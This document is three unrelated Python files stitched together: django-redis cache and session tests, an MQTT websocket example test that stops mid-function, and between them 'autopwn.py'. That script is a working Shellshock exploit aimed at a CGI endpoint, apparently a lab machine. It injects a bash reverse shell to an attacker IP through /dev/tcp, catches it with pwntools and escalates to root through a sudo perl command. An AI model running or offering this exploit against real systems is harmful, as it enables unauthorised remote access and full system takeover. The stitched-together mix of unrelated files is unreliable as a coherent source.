res = self.cache.get("test_key")
self.assertIsNone(res)
def test_timeout_parameter_as_positional_argument(self):
self.cache.set("test_key", 222, -1)
res = self.cache.get("test_key")
self.assertIsNone(res)
self.cache.set("test_key", 222, 1)
res1 = self.cache.get("test_key")
time.sleep(2)
res2 = self.cache.get("test_key")
self.assertEqual(res1, 222)
self.assertIsNone(res2)
# nx=True should not overwrite expire of key already in db
self.cache.set("test_key", 222, None)
self.cache.set("test_key", 222, -1, nx=True)
res = self.cache.get("test_key")
self.assertEqual(res, 222)
def test_timeout_negative(self):
self.cache.set("test_key", 222, timeout=-1)
res = self.cache.get("test_key")
self.assertIsNone(res)
self.cache.set("test_key", 222, timeout=None)
self.cache.set("test_key", 222, timeout=-1)
res = self.cache.get("test_key")
self.assertIsNone(res)
# nx=True should not overwrite expire of key already in db
self.cache.set("test_key", 222, timeout=None)
self.cache.set("test_key", 222, timeout=-1, nx=True)
res = self.cache.get("test_key")
self.assertEqual(res, 222)
def test_timeout_tiny(self):
self.cache.set("test_key", 222, timeout=0.00001)
res = self.cache.get("test_key")
self.assertIn(res, (None, 222))
def test_set_add(self):
self.cache.set("add_key", "Initial value")
res = self.cache.add("add_key", "New value")
self.assertIs(res, False)
res = cache.get("add_key")
self.assertEqual(res, "Initial value")
res = self.cache.add("other_key", "New value")
self.assertIs(res, True)
def test_get_many(self):
self.cache.set("a", 1)
self.cache.set("b", 2)
self.cache.set("c", 3)
res = self.cache.get_many(["a", "b", "c"])
self.assertEqual(res, {"a": 1, "b": 2, "c": 3})
def test_get_many_unicode(self):
self.cache.set("a", "1")
self.cache.set("b", "2")
self.cache.set("c", "3")
res = self.cache.get_many(["a", "b", "c"])
self.assertEqual(res, {"a": "1", "b": "2", "c": "3"})
def test_set_many(self):
self.cache.set_many({"a": 1, "b": 2, "c": 3})
res = self.cache.get_many(["a", "b", "c"])
self.assertEqual(res, {"a": 1, "b": 2, "c": 3})
def test_set_call_empty_pipeline(self):
if isinstance(self.cache.client, ShardClient):
self.skipTest("ShardClient doesn't support get_client")
pipeline = self.cache.client.get_client(write=True).pipeline()
key = "key"
value = "value"
with patch.object(pipeline, "set") as mocked_set:
self.cache.set(
key, value, client=pipeline,
)
if isinstance(self.cache.client, herd.HerdClient):
default_timeout = self.cache.client._backend.default_timeout
herd_timeout = (default_timeout + herd.CACHE_HERD_TIMEOUT) * 1000
herd_pack_value = self.cache.client._pack(value, default_timeout,)
mocked_set.assert_called_once_with(
self.cache.client.make_key(key, version=None),
self.cache.client.encode(herd_pack_value),
nx=False,
px=herd_timeout,
xx=False,
)
else:
mocked_set.assert_called_once_with(
self.cache.client.make_key(key, version=None),
self.cache.client.encode(value),
nx=False,
px=self.cache.client._backend.default_timeout * 1000,
xx=False,
)
def test_delete(self):
self.cache.set_many({"a": 1, "b": 2, "c": 3})
res = self.cache.delete("a")
self.assertTrue(bool(res))
res = self.cache.get_many(["a", "b", "c"])
self.assertEqual(res, {"b": 2, "c": 3})
res = self.cache.delete("a")
self.assertFalse(bool(res))
def test_delete_many(self):
self.cache.set_many({"a": 1, "b": 2, "c": 3})
res = self.cache.delete_many(["a", "b"])
self.assertTrue(bool(res))
res = self.cache.get_many(["a", "b", "c"])
self.assertEqual(res, {"c": 3})
res = self.cache.delete_many(["a", "b"])
self.assertFalse(bool(res))
def test_delete_many_generator(self):
self.cache.set_many({"a": 1, "b": 2, "c": 3})
res = self.cache.delete_many(key for key in ["a", "b"])
self.assertTrue(bool(res))
res = self.cache.get_many(["a", "b", "c"])
self.assertEqual(res, {"c": 3})
res = self.cache.delete_many(["a", "b"])
self.assertFalse(bool(res))
def test_delete_many_empty_generator(self):
res = self.cache.delete_many(key for key in [])
self.assertFalse(bool(res))
def test_incr(self):
if isinstance(self.cache.client, herd.HerdClient):
self.skipTest("HerdClient doesn't support incr")
self.cache.set("num", 1)
self.cache.incr("num")
res = self.cache.get("num")
self.assertEqual(res, 2)
self.cache.incr("num", 10)
res = self.cache.get("num")
self.assertEqual(res, 12)
# max 64 bit signed int
self.cache.set("num", 9223372036854775807)
self.cache.incr("num")
res = self.cache.get("num")
self.assertEqual(res, 9223372036854775808)
self.cache.incr("num", 2)
res = self.cache.get("num")
self.assertEqual(res, 9223372036854775810)
self.cache.set("num", 3)
self.cache.incr("num", 2)
res = self.cache.get("num")
self.assertEqual(res, 5)
def test_incr_error(self):
if isinstance(self.cache.client, herd.HerdClient):
self.skipTest("HerdClient doesn't support incr")
with self.assertRaises(ValueError):
# key does not exist
self.cache.incr("numnum")
def test_incr_ignore_check(self):
if isinstance(self.cache.client, ShardClient):
self.skipTest(
"ShardClient doesn't support argument ignore_key_check to incr"
)
if isinstance(self.cache.client, herd.HerdClient):
self.skipTest("HerdClient doesn't support incr")
# key exists check will be skipped and the value will be incremented by
# '1' which is the default delta
self.cache.incr("num", ignore_key_check=True)
res = self.cache.get("num")
self.assertEqual(res, 1)
self.cache.delete("num")
# since key doesnt exist it is set to the delta value, 10 in this case
self.cache.incr("num", 10, ignore_key_check=True)
res = self.cache.get("num")
self.assertEqual(res, 10)
self.cache.delete("num")
# following are just regression checks to make sure it still works as
# expected with incr max 64 bit signed int
self.cache.set("num", 9223372036854775807)
self.cache.incr("num", ignore_key_check=True)
res = self.cache.get("num")
self.assertEqual(res, 9223372036854775808)
self.cache.incr("num", 2, ignore_key_check=True)
res = self.cache.get("num")
self.assertEqual(res, 9223372036854775810)
self.cache.set("num", 3)
self.cache.incr("num", 2, ignore_key_check=True)
res = self.cache.get("num")
self.assertEqual(res, 5)
def test_get_set_bool(self):
self.cache.set("bool", True)
res = self.cache.get("bool")
self.assertIsInstance(res, bool)
self.assertIs(res, True)
self.cache.set("bool", False)
res = self.cache.get("bool")
self.assertIsInstance(res, bool)
self.assertIs(res, False)
def test_decr(self):
if isinstance(self.cache.client, herd.HerdClient):
self.skipTest("HerdClient doesn't support decr")
self.cache.set("num", 20)
self.cache.decr("num")
res = self.cache.get("num")
self.assertEqual(res, 19)
self.cache.decr("num", 20)
res = self.cache.get("num")
self.assertEqual(res, -1)
self.cache.decr("num", 2)
res = self.cache.get("num")
self.assertEqual(res, -3)
self.cache.set("num", 20)
self.cache.decr("num")
res = self.cache.get("num")
self.assertEqual(res, 19)
# max 64 bit signed int + 1
self.cache.set("num", 9223372036854775808)
self.cache.decr("num")
res = self.cache.get("num")
self.assertEqual(res, 9223372036854775807)
self.cache.decr("num", 2)
res = self.cache.get("num")
self.assertEqual(res, 9223372036854775805)
def test_version(self):
self.cache.set("keytest", 2, version=2)
res = self.cache.get("keytest")
self.assertIsNone(res)
res = self.cache.get("keytest", version=2)
self.assertEqual(res, 2)
def test_incr_version(self):
self.cache.set("keytest", 2)
self.cache.incr_version("keytest")
res = self.cache.get("keytest")
self.assertIsNone(res)
res = self.cache.get("keytest", version=2)
self.assertEqual(res, 2)
def test_delete_pattern(self):
for key in ["foo-aa", "foo-ab", "foo-bb", "foo-bc"]:
self.cache.set(key, "foo")
res = self.cache.delete_pattern("*foo-a*")
self.assertTrue(bool(res))
keys = self.cache.keys("foo*")
self.assertEqual(set(keys), {"foo-bb", "foo-bc"})
res = self.cache.delete_pattern("*foo-a*")
self.assertFalse(bool(res))
@patch("django_redis.cache.RedisCache.client")
def test_delete_pattern_with_custom_count(self, client_mock):
for key in ["foo-aa", "foo-ab", "foo-bb", "foo-bc"]:
self.cache.set(key, "foo")
self.cache.delete_pattern("*foo-a*", itersize=2)
client_mock.delete_pattern.assert_called_once_with("*foo-a*", itersize=2)
@patch("django_redis.cache.RedisCache.client")
def test_delete_pattern_with_settings_default_scan_count(self, client_mock):
for key in ["foo-aa", "foo-ab", "foo-bb", "foo-bc"]:
self.cache.set(key, "foo")
expected_count = django_redis.cache.DJANGO_REDIS_SCAN_ITERSIZE
self.cache.delete_pattern("*foo-a*")
client_mock.delete_pattern.assert_called_once_with(
"*foo-a*", itersize=expected_count
)
def test_close(self):
cache = caches["default"]
cache.set("f", "1")
cache.close()
def test_ttl(self):
cache = caches["default"]
# Test ttl
cache.set("foo", "bar", 10)
ttl = cache.ttl("foo")
if isinstance(cache.client, herd.HerdClient):
self.assertAlmostEqual(ttl, 12)
else:
self.assertAlmostEqual(ttl, 10)
# Test ttl None
cache.set("foo", "foo", timeout=None)
ttl = cache.ttl("foo")
self.assertIsNone(ttl)
# Test ttl with expired key
cache.set("foo", "foo", timeout=-1)
ttl = cache.ttl("foo")
self.assertEqual(ttl, 0)
# Test ttl with not existent key
ttl = cache.ttl("not-existent-key")
self.assertEqual(ttl, 0)
def test_persist(self):
self.cache.set("foo", "bar", timeout=20)
self.cache.persist("foo")
ttl = self.cache.ttl("foo")
self.assertIsNone(ttl)
def test_expire(self):
self.cache.set("foo", "bar", timeout=None)
self.cache.expire("foo", 20)
ttl = self.cache.ttl("foo")
self.assertAlmostEqual(ttl, 20)
def test_lock(self):
lock = self.cache.lock("foobar")
lock.acquire(blocking=True)
self.assertTrue(self.cache.has_key("foobar"))
lock.release()
self.assertFalse(self.cache.has_key("foobar"))
def test_lock_released_by_thread(self):
lock = self.cache.lock("foobar", thread_local=False)
lock.acquire(blocking=True)
def release_lock(lock_):
lock_.release()
t = threading.Thread(target=release_lock, args=[lock])
t.start()
t.join()
self.assertFalse(self.cache.has_key("foobar"))
def test_iter_keys(self):
cache = caches["default"]
if isinstance(cache.client, ShardClient):
self.skipTest("ShardClient doesn't support iter_keys")
cache.set("foo1", 1)
cache.set("foo2", 1)
cache.set("foo3", 1)
# Test simple result
result = set(cache.iter_keys("foo*"))
self.assertEqual(result, {"foo1", "foo2", "foo3"})
# Test limited result
result = list(cache.iter_keys("foo*", itersize=2))
self.assertEqual(len(result), 3)
# Test generator object
result = cache.iter_keys("foo*")
self.assertNotEqual(next(result), None)
def test_master_slave_switching(self):
if isinstance(self.cache.client, ShardClient):
self.skipTest("ShardClient doesn't support get_client")
cache = caches["sample"]
client = cache.client
client._server = ["foo", "bar"]
client._clients = ["Foo", "Bar"]
self.assertEqual(client.get_client(write=True), "Foo")
self.assertEqual(client.get_client(write=False), "Bar")
def test_touch_zero_timeout(self):
self.cache.set("test_key", 222, timeout=10)
self.assertIs(self.cache.touch("test_key", 0), True)
res = self.cache.get("test_key")
self.assertIsNone(res)
def test_touch_positive_timeout(self):
self.cache.set("test_key", 222, timeout=10)
self.assertIs(self.cache.touch("test_key", 2), True)
self.assertEqual(self.cache.get("test_key"), 222)
time.sleep(3)
self.assertIsNone(self.cache.get("test_key"))
def test_touch_negative_timeout(self):
self.cache.set("test_key", 222, timeout=10)
self.assertIs(self.cache.touch("test_key", -1), True)
res = self.cache.get("test_key")
self.assertIsNone(res)
def test_touch_missed_key(self):
self.assertIs(self.cache.touch("test_key_does_not_exist", 1), False)
def test_touch_forever(self):
self.cache.set("test_key", "foo", timeout=1)
result = self.cache.touch("test_key", None)
self.assertIs(result, True)
self.assertIsNone(self.cache.ttl("test_key"))
time.sleep(2)
self.assertEqual(self.cache.get("test_key"), "foo")
def test_touch_forever_nonexistent(self):
result = self.cache.touch("test_key_does_not_exist", None)
self.assertIs(result, False)
def test_touch_default_timeout(self):
self.cache.set("test_key", "foo", timeout=1)
result = self.cache.touch("test_key")
self.assertIs(result, True)
time.sleep(2)
self.assertEqual(self.cache.get("test_key"), "foo")
class DjangoOmitExceptionsTests(unittest.TestCase):
def setUp(self):
self._orig_setting = django_redis.cache.DJANGO_REDIS_IGNORE_EXCEPTIONS
django_redis.cache.DJANGO_REDIS_IGNORE_EXCEPTIONS = True
caches_setting = copy.deepcopy(settings.CACHES)
caches_setting["doesnotexist"]["OPTIONS"]["IGNORE_EXCEPTIONS"] = True
cm = override_settings(CACHES=caches_setting)
cm.enable()
self.addCleanup(cm.disable)
self.cache = caches["doesnotexist"]
def tearDown(self):
django_redis.cache.DJANGO_REDIS_IGNORE_EXCEPTIONS = self._orig_setting
def test_get_many_returns_default_arg(self):
self.assertIs(self.cache._ignore_exceptions, True)
self.assertEqual(self.cache.get_many(["key1", "key2", "key3"]), {})
def test_get(self):
self.assertIs(self.cache._ignore_exceptions, True)
self.assertIsNone(self.cache.get("key"))
self.assertEqual(self.cache.get("key", "default"), "default")
self.assertEqual(self.cache.get("key", default="default"), "default")
class DjangoOmitExceptionsPriority1Tests(unittest.TestCase):
def setUp(self):
self._orig_setting = django_redis.cache.DJANGO_REDIS_IGNORE_EXCEPTIONS
django_redis.cache.DJANGO_REDIS_IGNORE_EXCEPTIONS = False
caches_setting = copy.deepcopy(settings.CACHES)
caches_setting["doesnotexist"]["OPTIONS"]["IGNORE_EXCEPTIONS"] = True
cm = override_settings(CACHES=caches_setting)
cm.enable()
self.addCleanup(cm.disable)
self.cache = caches["doesnotexist"]
def tearDown(self):
django_redis.cache.DJANGO_REDIS_IGNORE_EXCEPTIONS = self._orig_setting
def test_get(self):
self.assertIs(self.cache._ignore_exceptions, True)
self.assertIsNone(self.cache.get("key"))
class DjangoOmitExceptionsPriority2Tests(unittest.TestCase):
def setUp(self):
self._orig_setting = django_redis.cache.DJANGO_REDIS_IGNORE_EXCEPTIONS
django_redis.cache.DJANGO_REDIS_IGNORE_EXCEPTIONS = True
caches_setting = copy.deepcopy(settings.CACHES)
caches_setting["doesnotexist"]["OPTIONS"]["IGNORE_EXCEPTIONS"] = False
cm = override_settings(CACHES=caches_setting)
cm.enable()
self.addCleanup(cm.disable)
self.cache = caches["doesnotexist"]
def tearDown(self):
django_redis.cache.DJANGO_REDIS_IGNORE_EXCEPTIONS = self._orig_setting
def test_get(self):
self.assertIs(self.cache._ignore_exceptions, False)
with self.assertRaises(ConnectionError):
self.cache.get("key")
# Copied from Django's sessions test suite. Keep in sync with upstream.
# https://github.com/django/django/blob/master/tests/sessions_tests/tests.py
class SessionTestsMixin:
# This does not inherit from TestCase to avoid any tests being run with this
# class, which wouldn't work, and to allow different TestCase subclasses to
# be used.
backend = None # subclasses must specify
def setUp(self):
self.session = self.backend()
def tearDown(self):
# NB: be careful to delete any sessions created; stale sessions fill up
# the /tmp (with some backends) and eventually overwhelm it after lots
# of runs (think buildbots)
self.session.delete()
def test_new_session(self):
self.assertIs(self.session.modified, False)
self.assertIs(self.session.accessed, False)
def test_get_empty(self):
self.assertIsNone(self.session.get("cat"))
def test_store(self):
self.session["cat"] = "dog"
self.assertIs(self.session.modified, True)
self.assertEqual(self.session.pop("cat"), "dog")
def test_pop(self):
self.session["some key"] = "exists"
# Need to reset these to pretend we haven't accessed it:
self.accessed = False
self.modified = False
self.assertEqual(self.session.pop("some key"), "exists")
self.assertIs(self.session.accessed, True)
self.assertIs(self.session.modified, True)
self.assertIsNone(self.session.get("some key"))
def test_pop_default(self):
self.assertEqual(
self.session.pop("some key", "does not exist"), "does not exist"
)
self.assertIs(self.session.accessed, True)
self.assertIs(self.session.modified, False)
def test_pop_default_named_argument(self):
self.assertEqual(
self.session.pop("some key", default="does not exist"), "does not exist"
)
self.assertIs(self.session.accessed, True)
self.assertIs(self.session.modified, False)
def test_pop_no_default_keyerror_raised(self):
with self.assertRaises(KeyError):
self.session.pop("some key")
def test_setdefault(self):
self.assertEqual(self.session.setdefault("foo", "bar"), "bar")
self.assertEqual(self.session.setdefault("foo", "baz"), "bar")
self.assertIs(self.session.accessed, True)
self.assertIs(self.session.modified, True)
def test_update(self):
self.session.update({"update key": 1})
self.assertIs(self.session.accessed, True)
self.assertIs(self.session.modified, True)
self.assertEqual(self.session.get("update key"), 1)
def test_has_key(self):
self.session["some key"] = 1
self.session.modified = False
self.session.accessed = False
self.assertIn("some key", self.session)
self.assertIs(self.session.accessed, True)
self.assertIs(self.session.modified, False)
def test_values(self):
self.assertEqual(list(self.session.values()), [])
self.assertIs(self.session.accessed, True)
self.session["some key"] = 1
self.session.modified = False
self.session.accessed = False
self.assertEqual(list(self.session.values()), [1])
self.assertIs(self.session.accessed, True)
self.assertIs(self.session.modified, False)
def test_keys(self):
self.session["x"] = 1
self.session.modified = False
self.session.accessed = False
self.assertEqual(list(self.session.keys()), ["x"])
self.assertIs(self.session.accessed, True)
self.assertIs(self.session.modified, False)
def test_items(self):
self.session["x"] = 1
self.session.modified = False
self.session.accessed = False
self.assertEqual(list(self.session.items()), [("x", 1)])
self.assertIs(self.session.accessed, True)
self.assertIs(self.session.modified, False)
def test_clear(self):
self.session["x"] = 1
self.session.modified = False
self.session.accessed = False
self.assertEqual(list(self.session.items()), [("x", 1)])
self.session.clear()
self.assertEqual(list(self.session.items()), [])
self.assertIs(self.session.accessed, True)
self.assertIs(self.session.modified, True)
def test_save(self):
self.session.save()
self.assertIs(self.session.exists(self.session.session_key), True)
def test_delete(self):
self.session.save()
self.session.delete(self.session.session_key)
self.assertIs(self.session.exists(self.session.session_key), False)
def test_flush(self):
self.session["foo"] = "bar"
self.session.save()
prev_key = self.session.session_key
self.session.flush()
self.assertIs(self.session.exists(prev_key), False)
self.assertNotEqual(self.session.session_key, prev_key)
self.assertIsNone(self.session.session_key)
self.assertIs(self.session.modified, True)
self.assertIs(self.session.accessed, True)
def test_cycle(self):
self.session["a"], self.session["b"] = "c", "d"
self.session.save()
prev_key = self.session.session_key
prev_data = list(self.session.items())
self.session.cycle_key()
self.assertIs(self.session.exists(prev_key), False)
self.assertNotEqual(self.session.session_key, prev_key)
self.assertEqual(list(self.session.items()), prev_data)
def test_cycle_with_no_session_cache(self):
self.session["a"], self.session["b"] = "c", "d"
self.session.save()
prev_data = self.session.items()
self.session = self.backend(self.session.session_key)
self.assertIs(hasattr(self.session, "_session_cache"), False)
self.session.cycle_key()
self.assertCountEqual(self.session.items(), prev_data)
def test_save_doesnt_clear_data(self):
self.session["a"] = "b"
self.session.save()
self.assertEqual(self.session["a"], "b")
def test_invalid_key(self):
# Submitting an invalid session key (either by guessing, or if the db has
# removed the key) results in a new key being generated.
try:
session = self.backend("1")
session.save()
self.assertNotEqual(session.session_key, "1")
self.assertIsNone(session.get("cat"))
session.delete()
finally:
# Some backends leave a stale cache entry for the invalid
# session key; make sure that entry is manually deleted
session.delete("1")
def test_session_key_empty_string_invalid(self):
"""Falsey values (Such as an empty string) are rejected."""
self.session._session_key = ""
self.assertIsNone(self.session.session_key)
def test_session_key_too_short_invalid(self):
"""Strings shorter than 8 characters are rejected."""
self.session._session_key = "1234567"
self.assertIsNone(self.session.session_key)
def test_session_key_valid_string_saved(self):
"""Strings of length 8 and up are accepted and stored."""
self.session._session_key = "12345678"
self.assertEqual(self.session.session_key, "12345678")
def test_session_key_is_read_only(self):
def set_session_key(session):
session.session_key = session._get_new_session_key()
with self.assertRaises(AttributeError):
set_session_key(self.session)
# Custom session expiry
def test_default_expiry(self):
# A normal session has a max age equal to settings
self.assertEqual(self.session.get_expiry_age(), settings.SESSION_COOKIE_AGE)
# So does a custom session with an idle expiration time of 0 (but it'll
# expire at browser close)
self.session.set_expiry(0)
self.assertEqual(self.session.get_expiry_age(), settings.SESSION_COOKIE_AGE)
def test_custom_expiry_seconds(self):
modification = timezone.now()
self.session.set_expiry(10)
date = self.session.get_expiry_date(modification=modification)
self.assertEqual(date, modification + timedelta(seconds=10))
age = self.session.get_expiry_age(modification=modification)
self.assertEqual(age, 10)
def test_custom_expiry_timedelta(self):
modification = timezone.now()
# Mock timezone.now, because set_expiry calls it on this code path.
original_now = timezone.now
try:
timezone.now = lambda: modification
self.session.set_expiry(timedelta(seconds=10))
finally:
timezone.now = original_now
date = self.session.get_expiry_date(modification=modification)
self.assertEqual(date, modification + timedelta(seconds=10))
age = self.session.get_expiry_age(modification=modification)
self.assertEqual(age, 10)
def test_custom_expiry_datetime(self):
modification = timezone.now()
self.session.set_expiry(modification + timedelta(seconds=10))
date = self.session.get_expiry_date(modification=modification)
self.assertEqual(date, modification + timedelta(seconds=10))
age = self.session.get_expiry_age(modification=modification)
self.assertEqual(age, 10)
def test_custom_expiry_reset(self):
self.session.set_expiry(None)
self.session.set_expiry(10)
self.session.set_expiry(None)
self.assertEqual(self.session.get_expiry_age(), settings.SESSION_COOKIE_AGE)
def test_get_expire_at_browser_close(self):
# Tests get_expire_at_browser_close with different settings and different
# set_expiry calls
with override_settings(SESSION_EXPIRE_AT_BROWSER_CLOSE=False):
self.session.set_expiry(10)
self.assertIs(self.session.get_expire_at_browser_close(), False)
self.session.set_expiry(0)
self.assertIs(self.session.get_expire_at_browser_close(), True)
self.session.set_expiry(None)
self.assertIs(self.session.get_expire_at_browser_close(), False)
with override_settings(SESSION_EXPIRE_AT_BROWSER_CLOSE=True):
self.session.set_expiry(10)
self.assertIs(self.session.get_expire_at_browser_close(), False)
self.session.set_expiry(0)
self.assertIs(self.session.get_expire_at_browser_close(), True)
self.session.set_expiry(None)
self.assertIs(self.session.get_expire_at_browser_close(), True)
def test_decode(self):
# Ensure we can decode what we encode
data = {"a test key": "a test value"}
encoded = self.session.encode(data)
self.assertEqual(self.session.decode(encoded), data)
def test_decode_failure_logged_to_security(self):
bad_encode = base64.b64encode(b"flaskdj:alkdjf").decode("ascii")
with self.assertLogs("django.security.SuspiciousSession", "WARNING") as cm:
self.assertEqual({}, self.session.decode(bad_encode))
# The failed decode is logged.
self.assertIn("corrupted", cm.output[0])
def test_actual_expiry(self):
# this doesn't work with JSONSerializer (serializing timedelta)
with override_settings(
SESSION_SERIALIZER="django.contrib.sessions.serializers.PickleSerializer"
):
self.session = self.backend() # reinitialize after overriding settings
# Regression test for #19200
old_session_key = None
new_session_key = None
try:
self.session["foo"] = "bar"
self.session.set_expiry(-timedelta(seconds=10))
self.session.save()
old_session_key = self.session.session_key
# With an expiry date in the past, the session expires instantly.
new_session = self.backend(self.session.session_key)
new_session_key = new_session.session_key
self.assertNotIn("foo", new_session)
finally:
self.session.delete(old_session_key)
self.session.delete(new_session_key)
@unittest.skipIf(VERSION < (2, 0), "Requires Django 2.0+")
def test_session_load_does_not_create_record(self):
"""
Loading an unknown session key does not create a session record.
Creating session records on load is a DOS vulnerability.
"""
session = self.backend("someunknownkey")
session.load()
self.assertIsNone(session.session_key)
self.assertIs(session.exists(session.session_key), False)
# provided unknown key was cycled, not reused
self.assertNotEqual(session.session_key, "someunknownkey")
def test_session_save_does_not_resurrect_session_logged_out_in_other_context(self):
"""
Sessions shouldn't be resurrected by a concurrent request.
"""
from django.contrib.sessions.backends.base import UpdateError
# Create new session.
s1 = self.backend()
s1["test_data"] = "value1"
s1.save(must_create=True)
# Logout in another context.
s2 = self.backend(s1.session_key)
s2.delete()
# Modify session in first context.
s1["test_data"] = "value2"
with self.assertRaises(UpdateError):
# This should throw an exception as the session is deleted, not
# resurrect the session.
s1.save()
self.assertEqual(s1.load(), {})
class SessionTests(SessionTestsMixin, unittest.TestCase):
backend = CacheSession
def test_actual_expiry(self):
if isinstance(
caches[DEFAULT_CACHE_ALIAS].client._serializer, MSGPackSerializer
):
self.skipTest("msgpack serializer doesn't support datetime serialization")
super().test_actual_expiry()
class TestDefaultClient(unittest.TestCase):
@patch("test_backend.DefaultClient.get_client")
@patch("test_backend.DefaultClient.__init__", return_value=None)
def test_delete_pattern_calls_get_client_given_no_client(
self, init_mock, get_client_mock
):
client = DefaultClient()
client._backend = Mock()
client._backend.key_prefix = ""
client.delete_pattern(pattern="foo*")
get_client_mock.assert_called_once_with(write=True)
@patch("test_backend.DefaultClient.make_pattern")
@patch("test_backend.DefaultClient.get_client", return_value=Mock())
@patch("test_backend.DefaultClient.__init__", return_value=None)
def test_delete_pattern_calls_make_pattern(
self, init_mock, get_client_mock, make_pattern_mock
):
client = DefaultClient()
client._backend = Mock()
client._backend.key_prefix = ""
get_client_mock.return_value.scan_iter.return_value = []
client.delete_pattern(pattern="foo*")
kwargs = {"version": None, "prefix": None}
# if not isinstance(caches['default'].client, ShardClient):
# kwargs['prefix'] = None
make_pattern_mock.assert_called_once_with("foo*", **kwargs)
@patch("test_backend.DefaultClient.make_pattern")
@patch("test_backend.DefaultClient.get_client", return_value=Mock())
@patch("test_backend.DefaultClient.__init__", return_value=None)
def test_delete_pattern_calls_scan_iter_with_count_if_itersize_given(
self, init_mock, get_client_mock, make_pattern_mock
):
client = DefaultClient()
client._backend = Mock()
client._backend.key_prefix = ""
get_client_mock.return_value.scan_iter.return_value = []
client.delete_pattern(pattern="foo*", itersize=90210)
get_client_mock.return_value.scan_iter.assert_called_once_with(
count=90210, match=make_pattern_mock.return_value
)
class TestShardClient(unittest.TestCase):
@patch("test_backend.DefaultClient.make_pattern")
@patch("test_backend.ShardClient.__init__", return_value=None)
def test_delete_pattern_calls_scan_iter_with_count_if_itersize_given(
self, init_mock, make_pattern_mock
):
client = ShardClient()
client._backend = Mock()
client._backend.key_prefix = ""
connection = Mock()
connection.scan_iter.return_value = []
client._serverdict = {"test": connection}
client.delete_pattern(pattern="foo*", itersize=10)
connection.scan_iter.assert_called_once_with(
count=10, match=make_pattern_mock.return_value
)
@patch("test_backend.DefaultClient.make_pattern")
@patch("test_backend.ShardClient.__init__", return_value=None)
def test_delete_pattern_calls_scan_iter(self, init_mock, make_pattern_mock):
client = ShardClient()
client._backend = Mock()
client._backend.key_prefix = ""
connection = Mock()
connection.scan_iter.return_value = []
client._serverdict = {"test": connection}
client.delete_pattern(pattern="foo*")
connection.scan_iter.assert_called_once_with(
match=make_pattern_mock.return_value
)
@patch("test_backend.DefaultClient.make_pattern")
@patch("test_backend.ShardClient.__init__", return_value=None)
def test_delete_pattern_calls_delete_for_given_keys(
self, init_mock, make_pattern_mock
):
client = ShardClient()
client._backend = Mock()
client._backend.key_prefix = ""
connection = Mock()
connection.scan_iter.return_value = [Mock(), Mock()]
connection.delete.return_value = 0
client._serverdict = {"test": connection}
client.delete_pattern(pattern="foo*")
connection.delete.assert_called_once_with(*connection.scan_iter.return_value)
|
autopwn.py
|
#!/usr/bin/python3
#coding: utf-8
#----------------------------------------------------------
#Made by: WizzzStark
#Remember to change your attacker IP in request function.
#-----------------------------------------------------------
import requests
import pdb
import threading
import signal
import sys
import time
import os
from pwn import *
ip_maquina='10.10.10.56'
lport = 1234
def exit(sig, frame):
print("\n [!] Saliendo...\n")
sys.exit(1)
signal.signal(signal.SIGINT, exit)
def request():
os.system("curl -H \"user-agent: () { :; }; echo;echo; /bin/bash -c 'bash -i >& /dev/tcp/10.10.15.122/1234 0>&1'\" http://10.10.10.56/cgi-bin/user.sh ")
if __name__=='__main__':
try:
threading.Thread(target=request, args=()).start()
except Esception as e:
log.error(str(e))
p1 = log.progress("Acceso")
p1.status("Ganando acceso al sistema")
shell = listen(lport, timeout=10).wait_for_connection()
if shell.sock is None:
p1.failure("No ha sido posible ganar acceso al sistema")
sys.exit(1)
else:
p1.success("Se ha ganado acceso con exito")
p2 = log.progress("Privilege Escalation")
p2.status("Migrando al usuario root")
shell.sendline("sudo /usr/bin/perl -e 'exec \"/bin/sh\"'")
p2.success("Se migró al usuario root correctamente")
shell.interactive()
|
mqtt_ws_example_test.py
|
from __future__ import print_function
from __future__ import unicode_literals
from builtins import str
import re
import os
import sys
import paho.mqtt.client as mqtt
from threading import Thread, Event
try:
import IDF
except Exception:
# this is a test case write with tiny-test-fw.
# to run test cases outside tiny-test-fw,
# we need to set environment variable `TEST_FW_PATH`,
# then get and insert `TEST_FW_PATH` to sys path before import FW module
test_fw_path = os.getenv("TEST_FW_PATH")
if test_fw_path and test_fw_path not in sys.path:
sys.path.insert(0, test_fw_path)
import IDF
import DUT
event_client_connected = Event()
event_stop_client = Event()
event_client_received_correct = Event()
message_log = ""
# The callback for when the client receives a CONNACK response from the server.
def on_connect(client, userdata, flags, rc):
print("Connected with result code " + str(rc))
event_client_connected.set()
client.subscribe("/topic/qos0")
def mqtt_client_task(client):
while not event_stop_client.is_set():
client.loop()
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
global message_log
payload = msg.payload.decode()
if not event_client_received_correct.is_set() and payload == "data":
client.publish("/topic/qos0", "data_to_esp32")
if msg.topic == "/topic/qos0" and payload == "data":
event_client_received_correct.set()
message_log += "Received data:" + msg.topic + " " + payload + "\n"
@IDF.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_mqtt_ws(env, extra_data):
broker_url = ""
broker_port = 0
"""
steps: |
1. join AP and connects to ws broker
2. Test connects a client to the same broker
3. Test evaluates it received correct qos0 message
4. Test ESP32 client received correct qos0 message
"""
dut1 = env.get_dut("mqtt_websocket", "examples/protocols/mqtt/ws")
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "mqtt_websocket.bin")
bin_size = os.path.getsize(binary_file)
IDF.log_performance("mqtt_websocket_bin_size", "{}KB".format(bin_size // 1024))
IDF.check_performance("mqtt_websocket_size", bin_size // 1024)
# Look for host:port in sdkconfig
try:
value = re.search(r'\:\/\/([^:]+)\:([0-9]+)', dut1.app.get_sdkconfig()["CONFIG_BROKER_URI"])
broker_url = value.group(1)
broker_port = int(value.group(2))
except Exception:
print('ENV_TEST_FAILURE: Cannot find broker url in sdkconfig')
raise
client = None
# 1. Test connects to a broker
try:
client = mqtt.Client(transport="websockets")
client.on_connect = on_connect
client.on_message = on_message
client.ws_set_options(path="/ws", headers=None)
print("Connecting...")
client.connect(broker_url, broker_port, 60)
except Exception:
print("ENV_TEST_FAILURE: Unexpected error while connecting to broker {}: {}:".format(broker_url, sys.exc_info()[0]))
raise
# Starting a py-client in a separate thread
thread1 = Thread(target=mqtt_client_task, args=(client,))
thread1.start()
try:
print("Connecting py-client to broker {}:{}...".format(broker_url, broker_port))
if not event_client_connected.wait(timeout=30):
raise ValueError("ENV_TEST_FAILURE: Test script cannot connect to broker: {}".format(broker_url))
dut1.start_app()
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
